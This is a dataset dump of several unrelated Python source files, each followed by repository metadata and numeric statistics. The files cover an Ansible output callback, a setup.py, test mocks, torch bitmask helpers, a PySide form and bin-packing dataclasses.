                    if str2 == "Unreach":
                        stri = str1 + " " + command_temp + " " + str2 + " Host is Unreachable."
                    else:
                        stri = str1 + " " + command_temp + " " + str2 + " " + str3
                    host_list.append(stri.split(None, 3))
        if os.path.exists('report.log') == True:
            max_length_line = len(max(open('report.log', 'r'), key=len).strip())
        elif os.path.exists('temp_abc') == True:
            max_length_line = len(max(open('temp_abc', 'r'), key=len).strip())
        if len(host_list) != 0:
            if max_length_line+40 >= 168:
                max_length_line =128
            print("\n")
            for i in range(max_length_line+40):
                print("\033[34m-\033[0m", end = '')
            print("\033[36m\nOutput of Ansible Command\033[0m")
            for i in range(max_length_line+40):
                print("\033[34m-\033[0m", end ='')
            print("\n\033[1;36mHost Name\033[0m\t\t\t\033[34m|\033[0m\t\033[1;36mEnvironoment\033[0m\t\033[34m|\033[0m\033[1;36mStatus\033[0m\033[34m|\033[0m \033[1;36mOutput\033[0m")
            for line in range(len(host_list)):
                hn,cn,st,outp = host_list[line]
                # flatten escaped whitespace/quotes in the output column
                outp = outp.replace("\\t"," ")
                outp = outp.replace("\\n",",")
                outp = outp.replace("\\r"," ")
                outp = outp.replace("\"","")
                outp = outp.replace("\\\\","\\")
                outp = re.sub(r'[\n]', ' ', outp)
                outp = re.sub(' +', ' ', outp)
                for i in range(max_length_line+40):
                    print("\033[34m-\033[0m", end='')
                # red status for failures/unreachable, green otherwise
                if st.strip() == "Unreach" or st.strip() == "Fail":
                    print("\n\033[2;93m%s\033[0m\t\t\t\033[34m|\033[0m\t\033[93m%s\033[0m\t\033[34m|\033[0m \033[31m%s\033[0m \033[34m|\033[0m \033[93m%s\033[0m" % ( hn.center(10), cn.center(10), st.center(10).strip(), outp.center(10)))
                else:
                    print("\n\033[2;93m%s\033[0m\t\t\t\033[34m|\033[0m\t\033[93m%s\033[0m\t\033[34m|\033[0m \033[32m%s\033[0m \033[34m|\033[0m \033[93m%s\033[0m" % ( hn.center(10), cn.center(10), st.center(10).strip(), outp.center(10)))
            for i in range(max_length_line+40):
                print("\033[34m-\033[0m", end ='')
            print("\n")
        if os.path.exists('temp_abc') == True:
            os.remove('temp_abc')
        if os.path.exists('report.log') == True:
            os.remove('report.log')
        if os.path.exists('msg_temp') == True:
            os.remove('msg_temp')
    def v2_playbook_on_start(self, playbook):
        """Log the playbook name (verbosity > 1) and CLI options (verbosity > 3)."""
        t17 = threading.Thread(target=print_star, args=("start",))
        t17.start()
        if self._display.verbosity > 1:
            from os.path import basename
            f.writelines("%s-----PLAYBOOK: %s\n" % (datetime.now(), basename(playbook._file_name)))
        if self._display.verbosity > 3:
            if self._options is not None:
                for option in dir(self._options):
                    # skip private attrs and optparse internals
                    if option.startswith('_') or option in ['read_file', 'ensure_value', 'read_module']:
                        continue
                    val = getattr(self._options, option)
                    if val:
                        self._display.vvvv('%s: %s' % (option, val))
        t17 = threading.Thread(target=print_star, args=("stop",))
    def v2_runner_retry(self, command_result):
        """Log a FAILED - RETRYING message with the remaining retry count."""
        # NOTE(review): unlike the other handlers this spinner thread is
        # started with args ("",) rather than ("start",)
        t18 = threading.Thread(target=print_star, args=("",))
        t18.start()
        task_name = command_result.task_name or command_result._task
        msg = "FAILED - RETRYING: %s (%d retries left)." % (task_name, command_result._result['retries'] - command_result._result['attempts'])
        if (self._display.verbosity > 2 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
            msg += "Result was: %s" % self._dump_results(command_result._result)
        f.writelines("%s-----%s\n" % (datetime.now(), msg))
        t18 = threading.Thread(target=print_star, args=("stop",))
| 44.272727 | 227 | 0.609355 | 2,636 | 19,967 | 4.379742 | 0.115706 | 0.108099 | 0.083932 | 0.081074 | 0.666869 | 0.617843 | 0.592724 | 0.477956 | 0.4479 | 0.44175 | 0 | 0.033117 | 0.221165 | 19,967 | 450 | 228 | 44.371111 | 0.709279 | 0.014324 | 0 | 0.338462 | 0 | 0.012821 | 0.163557 | 0.038039 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.005128 | 0.041026 | null | null | 0.164103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32057b2f2625521defc8d8e72d5b52ef1fd8a76a | 464 | py | Python | validator/setup.py | acmiyaguchi/mozschema-validator | 04d265bb9359107580f8726bce5102b14a68f156 | [
"MIT"
] | null | null | null | validator/setup.py | acmiyaguchi/mozschema-validator | 04d265bb9359107580f8726bce5102b14a68f156 | [
"MIT"
] | 2 | 2018-04-13T20:54:16.000Z | 2018-05-01T01:11:32.000Z | validator/setup.py | acmiyaguchi/schema-validator | 04d265bb9359107580f8726bce5102b14a68f156 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from setuptools import setup
# Package definition for the Spark schema validation job.
requirements = [
    "pyspark",
    "click",
    "jsonschema",
]

setup(
    name='validator',
    version='0.1.0',
    author='Anthony Miyaguchi',
    author_email='amiyaguchi@mozilla.com',
    description='Spark schema validation job',
    url='https://github.com/acmiyaguchi/schema-validator',
    install_requires=requirements,
    packages=['validator'],
    package_dir={'validator': 'validator'},
)
| 22.095238 | 58 | 0.637931 | 49 | 464 | 5.979592 | 0.816327 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01084 | 0.204741 | 464 | 20 | 59 | 23.2 | 0.783198 | 0.077586 | 0 | 0 | 0 | 0 | 0.413146 | 0.051643 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3210ad0eb9f3c039c04a54147643c60d613ffab0 | 429 | py | Python | tests/mocks.py | Mahir-Sparkess/django-haystack-elasticsearch | dd47f0e9c492908d4cc090ad4377fe7fc5e5efb8 | [
"BSD-3-Clause"
] | 25 | 2016-12-29T14:08:00.000Z | 2019-03-08T06:41:02.000Z | tests/mocks.py | Mahir-Sparkess/django-haystack-elasticsearch | dd47f0e9c492908d4cc090ad4377fe7fc5e5efb8 | [
"BSD-3-Clause"
] | 3 | 2017-05-02T14:55:31.000Z | 2021-11-15T17:47:04.000Z | tests/mocks.py | Mahir-Sparkess/django-haystack-elasticsearch | dd47f0e9c492908d4cc090ad4377fe7fc5e5efb8 | [
"BSD-3-Clause"
] | 14 | 2017-01-12T03:33:43.000Z | 2021-05-10T04:39:37.000Z | # encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
from django.apps import apps
from haystack.models import SearchResult
class MockSearchResult(SearchResult):
    """SearchResult test double whose model is resolved from the 'core' app."""

    def __init__(self, app_label, model_name, pk, score, **kwargs):
        super(MockSearchResult, self).__init__(app_label, model_name, pk, score, **kwargs)
        # look up the concrete model class so _model behaves like a real result
        model_cls = apps.get_model('core', model_name)
        self._model = model_cls
| 33 | 90 | 0.762238 | 55 | 429 | 5.545455 | 0.581818 | 0.088525 | 0.085246 | 0.111475 | 0.196721 | 0.196721 | 0.196721 | 0 | 0 | 0 | 0 | 0.002717 | 0.142191 | 429 | 12 | 91 | 35.75 | 0.826087 | 0.034965 | 0 | 0 | 0 | 0 | 0.009709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.714286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
32123a8dc6e051f2c7fb4618cac502b6d5f56cc8 | 1,520 | py | Python | src/utils/boolmask.py | r39ashmi/LastMileRoutingResearchChallenge | 529fd68c69393501e0aedc55e957f927608eb393 | [
"MIT"
] | null | null | null | src/utils/boolmask.py | r39ashmi/LastMileRoutingResearchChallenge | 529fd68c69393501e0aedc55e957f927608eb393 | [
"MIT"
] | null | null | null | src/utils/boolmask.py | r39ashmi/LastMileRoutingResearchChallenge | 529fd68c69393501e0aedc55e957f927608eb393 | [
"MIT"
] | 1 | 2022-02-06T07:27:49.000Z | 2022-02-06T07:27:49.000Z | import torch
def _mask_long2byte(mask, n=None):
if n is None:
n = 8 * mask.size(-1)
return (mask[..., None] >> (torch.arange(8, out=mask.new()) * 8))[..., :n].to(torch.uint8).view(*mask.size()[:-1], -1)[..., :n]
def _mask_byte2bool(mask, n=None):
if n is None:
n = 8 * mask.size(-1)
return (mask[..., None] & (mask.new_ones(8) << torch.arange(8, out=mask.new()) * 1)).view(*mask.size()[:-1], -1)[..., :n] > 0
def mask_long2bool(mask, n=None):
    """Unpack an int64-packed bitmask into a boolean tensor of length n."""
    assert mask.dtype == torch.int64
    as_bytes = _mask_long2byte(mask)
    return _mask_byte2bool(as_bytes, n=n)
def mask_long_scatter(mask, values, check_unset=True):
    """
    Set one bit per batch entry of a packed int64 mask, in dimension -1.

    ``values`` holds the bit index to set for each batch entry; an entry of
    -1 leaves that row untouched.  Arbitrary leading batch dimensions are
    supported, but only a single bit can be set per call (unlike a normal
    scatter).
    """
    assert mask.size()[:-1] == values.size()
    word_idx = torch.arange(mask.size(-1), out=mask.new())
    values_ = values[..., None]  # broadcast against the packed words
    # select the 64-bit word whose span contains the requested bit index
    # (no word matches for -1, so nothing gets set)
    where = (values_ >= (word_idx * 64)) & (values_ < ((word_idx + 1) * 64))
    if check_unset:
        # the targeted bit must not already be set
        assert not ((mask & (where.long() << (values_ % 64))) > 0).any()
    # shift a 1 into position within the selected word
    # (% not strictly necessary as bitshift is cyclic)
    return mask | (where.long() << (values_ % 64))
| 40 | 131 | 0.621711 | 237 | 1,520 | 3.907173 | 0.379747 | 0.051836 | 0.058315 | 0.038877 | 0.218143 | 0.172786 | 0.092873 | 0.092873 | 0.092873 | 0.092873 | 0 | 0.031852 | 0.215132 | 1,520 | 37 | 132 | 41.081081 | 0.744342 | 0.324342 | 0 | 0.210526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.210526 | false | 0 | 0.052632 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32147d157b7f67d07b64ae72daa2b900f0c45344 | 1,401 | py | Python | w20data.py | zhuligs/Pallas | c8d77d0963c080fa7331560f1659001488b0328f | [
"MIT"
] | null | null | null | w20data.py | zhuligs/Pallas | c8d77d0963c080fa7331560f1659001488b0328f | [
"MIT"
] | null | null | null | w20data.py | zhuligs/Pallas | c8d77d0963c080fa7331560f1659001488b0328f | [
"MIT"
] | null | null | null | import fppy
class Wstorage(object):
    """Registry of minimum and saddle-point cells, de-duplicated by
    fingerprint distance and energy difference.

    Two cells are considered the same structure when their fingerprint
    distance is below ``fpdiff`` AND their energy difference is below
    ``ediff`` (see :meth:`compare`).
    """

    def __init__(self, ediff=0.001, fpdiff=0.001,
                 ntyp=None):
        self.minima = []             # stored minimum cells
        self.saddle = []             # stored saddle-point cells
        self.ediff = float(ediff)    # energy tolerance for identity
        self.fpdiff = float(fpdiff)  # fingerprint-distance tolerance
        self.ntyp = ntyp             # number of atom types, passed to fppy
        # self.types = types

    def add_minima(self, new):
        """Register *new* as a minimum.

        Returns the stored duplicate if an equivalent minimum already
        exists; otherwise assigns *new* an id and name ('M<id>'), stores
        it and returns it.
        """
        for m in self.minima:
            if self.compare(new, m):
                return m
        newid = len(self.minima) + 1
        new.set_iden(newid)
        new.set_name('M' + str(newid))
        self.minima.append(new)
        return new

    def add_saddle(self, new, m1, m2):
        """Register *new* as a saddle point connecting minima *m1* and *m2*.

        If an equivalent saddle already exists, record both connections on
        it and return it; otherwise assign *new* an id and name ('S<id>'),
        record the connections, store it and return it.
        """
        id1 = m1.get_iden()
        id2 = m2.get_iden()
        for s in self.saddle:
            if self.compare(new, s):
                s.add_conn(id1)
                s.add_conn(id2)
                return s  # BUG FIX: was 'retrun s' (SyntaxError)
        newid = len(self.saddle) + 1
        new.set_iden(newid)
        new.add_conn(id1)
        new.add_conn(id2)
        new.set_name('S' + str(newid))
        self.saddle.append(new)
        return new

    def compare(self, cell1, cell2):
        """Return True when *cell1* and *cell2* match within tolerances."""
        fp1 = cell1.get_lfp()
        fp2 = cell2.get_lfp()
        e1 = cell1.get_e()
        e2 = cell2.get_e()
        types = cell1.get_types()
        (dist, m) = fppy.fp_dist(self.ntyp, types, fp1, fp2)
        return dist < self.fpdiff and abs(e1 - e2) < self.ediff
| 28.591837 | 60 | 0.511777 | 186 | 1,401 | 3.736559 | 0.306452 | 0.057554 | 0.03741 | 0.046043 | 0.115108 | 0.054676 | 0 | 0 | 0 | 0 | 0 | 0.039728 | 0.371163 | 1,401 | 48 | 61 | 29.1875 | 0.749149 | 0.012848 | 0 | 0.090909 | 0 | 0 | 0.001448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.022727 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3215f19ecc641f982700a40585e4986b5ee1a928 | 467 | py | Python | tests/script/tavern_chars.py | ufosc/MuddySwamp | 2e28f9db1f0f4e1c4aafccdf7f58bf2a22b82366 | [
"MIT"
] | 10 | 2018-10-14T00:29:27.000Z | 2020-05-02T23:59:30.000Z | tests/script/tavern_chars.py | ufosc/MuddySwamp | 2e28f9db1f0f4e1c4aafccdf7f58bf2a22b82366 | [
"MIT"
] | 36 | 2018-06-13T05:48:10.000Z | 2020-02-05T18:51:52.000Z | tests/script/tavern_chars.py | ufosc/MuddySwamp | 2e28f9db1f0f4e1c4aafccdf7f58bf2a22b82366 | [
"MIT"
] | 8 | 2018-08-30T03:13:13.000Z | 2020-05-15T21:42:52.000Z | """a few CharacterClasses for testing the 'find' method
(see save 'tavern.yaml')"""
from swampymud.character import Character
class Humanoid(Character):
    """a base class for all other classes in this group"""


class Merchant(Humanoid):
    """good with coin (especially other people's)"""


class Wizard(Humanoid):
    """masters of the perplexing arts"""


class Thug(Humanoid):
    """hired hands of few scruples"""


class Thief(Humanoid):
    """sneaky folks"""
| 24.578947 | 58 | 0.700214 | 61 | 467 | 5.360656 | 0.721311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167024 | 467 | 18 | 59 | 25.944444 | 0.840617 | 0.51606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32164d5e1796ce8618580e0c6f7288cde383f143 | 256 | py | Python | iptfe/blog/urls.py | I-prefer-the-front-end/I-prefer-the-front-end | 62e3c3e6b40ea350104bde5bd99bc88065506234 | [
"MIT"
] | null | null | null | iptfe/blog/urls.py | I-prefer-the-front-end/I-prefer-the-front-end | 62e3c3e6b40ea350104bde5bd99bc88065506234 | [
"MIT"
] | null | null | null | iptfe/blog/urls.py | I-prefer-the-front-end/I-prefer-the-front-end | 62e3c3e6b40ea350104bde5bd99bc88065506234 | [
"MIT"
] | null | null | null | from django.conf.urls import url
from blog import views
# URL routes for the blog app.
urlpatterns = [
    # Archive listing, served by views.archive.
    url(r'^archive/$', views.archive, name='archive'),
    # Comment endpoint, served by views.comment.
    url(r'^comment/$', views.comment, name='comment'),
    # Individual post addressed by an optional slug (letters, digits,
    # '_', '-', '.'); both slug and trailing slash are optional.
    url(r'^(?P<slug>[A-Za-z0-9_\-.]+)?/?$', views.post, name='post'),
]
| 25.6 | 69 | 0.617188 | 37 | 256 | 4.243243 | 0.540541 | 0.076433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00905 | 0.136719 | 256 | 9 | 70 | 28.444444 | 0.701357 | 0 | 0 | 0 | 0 | 0 | 0.269531 | 0.121094 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32165aca27fde8f36646a522b8ab5e04657a70e7 | 10,473 | py | Python | gui/qt_ui/OptimizationQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 7 | 2018-11-18T07:11:05.000Z | 2021-05-06T21:53:40.000Z | gui/qt_ui/OptimizationQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 9 | 2019-09-23T16:34:09.000Z | 2020-05-26T18:49:43.000Z | gui/qt_ui/OptimizationQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 2 | 2019-04-18T14:34:31.000Z | 2019-06-19T19:34:33.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\Victor\Dropbox\DFR\film2dose\qt_ui\evo_widget.ui'
#
# Created: Tue Sep 29 14:54:23 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Form(object):
    """UI scaffold generated by pyside-uic from 'evo_widget.ui'.

    Per the header warning, this file is machine generated; regenerate
    it from the .ui file instead of editing by hand.
    """

    def setupUi(self, Form):
        # Build all widgets and place them in a QGridLayout on Form.
        # addWidget arguments are (widget, row, column, rowSpan, colSpan).
        Form.setObjectName("Form")
        Form.resize(1161, 691)
        self.gridLayout = QtGui.QGridLayout(Form)
        self.gridLayout.setObjectName("gridLayout")
        self.optimize_button = QtGui.QPushButton(Form)
        self.optimize_button.setObjectName("optimize_button")
        self.gridLayout.addWidget(self.optimize_button, 12, 1, 1, 1)
        self.pop_spin = QtGui.QSpinBox(Form)
        self.pop_spin.setMaximum(5000)
        self.pop_spin.setProperty("value", 200)
        self.pop_spin.setObjectName("pop_spin")
        self.gridLayout.addWidget(self.pop_spin, 7, 0, 1, 1)
        self.label_5 = QtGui.QLabel(Form)
        self.label_5.setObjectName("label_5")
        self.gridLayout.addWidget(self.label_5, 6, 0, 1, 1)
        self.crop_border_spin = QtGui.QDoubleSpinBox(Form)
        self.crop_border_spin.setSingleStep(0.1)
        self.crop_border_spin.setProperty("value", 5.0)
        self.crop_border_spin.setObjectName("crop_border_spin")
        self.gridLayout.addWidget(self.crop_border_spin, 4, 1, 1, 1)
        self.label_2 = QtGui.QLabel(Form)
        self.label_2.setObjectName("label_2")
        self.gridLayout.addWidget(self.label_2, 3, 0, 1, 1)
        # Equation selector; item texts are assigned in retranslateUi.
        self.eq_combo = QtGui.QComboBox(Form)
        self.eq_combo.setObjectName("eq_combo")
        self.eq_combo.addItem("")
        self.eq_combo.addItem("")
        self.eq_combo.addItem("")
        self.eq_combo.addItem("")
        self.gridLayout.addWidget(self.eq_combo, 9, 0, 1, 1)
        self.mode_combo = QtGui.QComboBox(Form)
        self.mode_combo.setObjectName("mode_combo")
        self.mode_combo.addItem("")
        self.mode_combo.addItem("")
        self.mode_combo.addItem("")
        self.gridLayout.addWidget(self.mode_combo, 9, 1, 1, 1)
        self.label_8 = QtGui.QLabel(Form)
        self.label_8.setObjectName("label_8")
        self.gridLayout.addWidget(self.label_8, 2, 0, 1, 1)
        self.setup_button = QtGui.QPushButton(Form)
        self.setup_button.setObjectName("setup_button")
        self.gridLayout.addWidget(self.setup_button, 12, 0, 1, 1)
        self.label_4 = QtGui.QLabel(Form)
        self.label_4.setObjectName("label_4")
        self.gridLayout.addWidget(self.label_4, 8, 0, 1, 1)
        self.color_combo = QtGui.QComboBox(Form)
        self.color_combo.setObjectName("color_combo")
        self.color_combo.addItem("")
        self.color_combo.addItem("")
        self.color_combo.addItem("")
        self.gridLayout.addWidget(self.color_combo, 2, 1, 1, 1)
        self.label_6 = QtGui.QLabel(Form)
        self.label_6.setObjectName("label_6")
        self.gridLayout.addWidget(self.label_6, 6, 1, 1, 1)
        self.pixel_size_spin = QtGui.QDoubleSpinBox(Form)
        self.pixel_size_spin.setProperty("value", 1.0)
        self.pixel_size_spin.setObjectName("pixel_size_spin")
        self.gridLayout.addWidget(self.pixel_size_spin, 4, 0, 1, 1)
        self.label = QtGui.QLabel(Form)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 3, 1, 1, 1)
        self.poly_range_spin = QtGui.QDoubleSpinBox(Form)
        self.poly_range_spin.setMaximum(1000000.0)
        self.poly_range_spin.setProperty("value", 1.0)
        self.poly_range_spin.setObjectName("poly_range_spin")
        self.gridLayout.addWidget(self.poly_range_spin, 7, 1, 1, 1)
        self.label_3 = QtGui.QLabel(Form)
        self.label_3.setObjectName("label_3")
        self.gridLayout.addWidget(self.label_3, 8, 1, 1, 1)
        self.save_cal = QtGui.QPushButton(Form)
        self.save_cal.setObjectName("save_cal")
        self.gridLayout.addWidget(self.save_cal, 13, 1, 1, 1)
        self.label_7 = QtGui.QLabel(Form)
        self.label_7.setObjectName("label_7")
        self.gridLayout.addWidget(self.label_7, 14, 0, 1, 1)
        self.seed_spin = QtGui.QSpinBox(Form)
        self.seed_spin.setProperty("value", 1)
        self.seed_spin.setObjectName("seed_spin")
        self.gridLayout.addWidget(self.seed_spin, 14, 1, 1, 1)
        # Plain QWidget placeholders, presumably hosts for plots/images
        # filled elsewhere — TODO confirm against the application code.
        self.image_widget = QtGui.QWidget(Form)
        self.image_widget.setObjectName("image_widget")
        self.gridLayout.addWidget(self.image_widget, 10, 1, 1, 1)
        self.ref_widget = QtGui.QWidget(Form)
        self.ref_widget.setObjectName("ref_widget")
        self.gridLayout.addWidget(self.ref_widget, 10, 0, 1, 1)
        self.bg_checkBox = QtGui.QCheckBox(Form)
        self.bg_checkBox.setChecked(False)
        self.bg_checkBox.setObjectName("bg_checkBox")
        self.gridLayout.addWidget(self.bg_checkBox, 1, 0, 1, 1)

        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)

    def retranslateUi(self, Form):
        # Assign all user-visible (translatable) strings.
        Form.setWindowTitle(QtGui.QApplication.translate(
            "Form", "Optimization ", None, QtGui.QApplication.UnicodeUTF8))
        self.optimize_button.setText(QtGui.QApplication.translate(
            "Form", "Optimize", None, QtGui.QApplication.UnicodeUTF8))
        self.label_5.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Population size</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Optimization pixel size (mm)</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.eq_combo.setItemText(0, QtGui.QApplication.translate(
            "Form", "Equation 1 - Inverse Log poly", None,
            QtGui.QApplication.UnicodeUTF8))
        self.eq_combo.setItemText(1, QtGui.QApplication.translate(
            "Form", "Equation 2 - Inverse poly", None,
            QtGui.QApplication.UnicodeUTF8))
        self.eq_combo.setItemText(2, QtGui.QApplication.translate(
            "Form", "Equation 3 - Inverse arctan poly", None,
            QtGui.QApplication.UnicodeUTF8))
        self.eq_combo.setItemText(3, QtGui.QApplication.translate(
            "Form", "Equation 4 - 4th Degree Poly", None,
            QtGui.QApplication.UnicodeUTF8))
        self.mode_combo.setItemText(0, QtGui.QApplication.translate(
            "Form", "Polynomial curve fitting ", None,
            QtGui.QApplication.UnicodeUTF8))
        self.mode_combo.setItemText(1, QtGui.QApplication.translate(
            "Form", "Lateral correction", None,
            QtGui.QApplication.UnicodeUTF8))
        self.mode_combo.setItemText(2, QtGui.QApplication.translate(
            "Form", "Poly fit and correction", None,
            QtGui.QApplication.UnicodeUTF8))
        self.label_8.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"right\"><span style=\" font-weight:600;\">Color Channel:</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.setup_button.setText(QtGui.QApplication.translate(
            "Form", "Setup optimization", None, QtGui.QApplication.UnicodeUTF8))
        self.label_4.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Select Equation</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.color_combo.setItemText(0, QtGui.QApplication.translate(
            "Form", "Red", None, QtGui.QApplication.UnicodeUTF8))
        self.color_combo.setItemText(1, QtGui.QApplication.translate(
            "Form", "Green", None, QtGui.QApplication.UnicodeUTF8))
        self.color_combo.setItemText(2, QtGui.QApplication.translate(
            "Form", "Blue", None, QtGui.QApplication.UnicodeUTF8))
        self.label_6.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Poly bounds (+-)</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Crop border (mm)</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.label_3.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"center\"><span style=\" font-weight:600;\">Method</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.save_cal.setText(QtGui.QApplication.translate(
            "Form", "Save optimized calibration object", None,
            QtGui.QApplication.UnicodeUTF8))
        self.label_7.setText(QtGui.QApplication.translate(
            "Form",
            "<html><head/><body><p align=\"right\"><span style=\" font-weight:600;\">Random generator seed:</span></p></body></html>",
            None, QtGui.QApplication.UnicodeUTF8))
        self.bg_checkBox.setText(QtGui.QApplication.translate(
            "Form", "Background compensation", None,
            QtGui.QApplication.UnicodeUTF8))
| 64.648148 | 187 | 0.584264 | 1,146 | 10,473 | 5.213787 | 0.139616 | 0.130879 | 0.100084 | 0.115481 | 0.655397 | 0.437824 | 0.343766 | 0.297071 | 0.243347 | 0.159498 | 0 | 0.032738 | 0.288361 | 10,473 | 161 | 188 | 65.049689 | 0.768952 | 0.025781 | 0 | 0.182432 | 1 | 0 | 0.129083 | 0.040412 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013514 | false | 0 | 0.006757 | 0 | 0.027027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3218111e5ba3d23ed7e14e3bec03d4945cc872d0 | 713 | py | Python | bin_env/MapperData.py | ArChiiii/TSP_DRL_PtrNet | 8218a508c563d9641b341dff5a6241d90e4e031b | [
"MIT"
] | null | null | null | bin_env/MapperData.py | ArChiiii/TSP_DRL_PtrNet | 8218a508c563d9641b341dff5a6241d90e4e031b | [
"MIT"
] | null | null | null | bin_env/MapperData.py | ArChiiii/TSP_DRL_PtrNet | 8218a508c563d9641b341dff5a6241d90e4e031b | [
"MIT"
] | null | null | null |
from dataclasses import dataclass
from typing import List
from enum import Enum
class IterationResult(Enum):
    # Outcome codes for one mapping iteration.
    Success = 1
    Failure = 2
    BiggerThanBestContainer = 3
    SmallerThanCombinedImages = 4


@dataclass
class ContainerStats():
    # Counters collected while filling one container.
    rectangleAddAttempts: int
    nbrCellsGenerated: int
    lowestFreeHeightDeficit: int


@dataclass(order=True)
class BoxInfo():
    # Box dimensions; order=True makes instances sortable by
    # (height, width) in field-declaration order.
    height: int
    width: int


@dataclass
class MappedBoxInfo():
    # A box together with its mapped (x, y) position.
    x: int
    y: int
    boxInfo: BoxInfo


@dataclass
class IterationStats():
    # Summary of one iteration: its outcome, the container/sprite
    # dimensions used, and the placement of every box.
    result: IterationResult
    maxContainerWidth: int
    maxContainerHeight: int
    intermediateSpriteWidth: int
    intermediateSpriteHeight: int
    boxDetails: List[MappedBoxInfo]
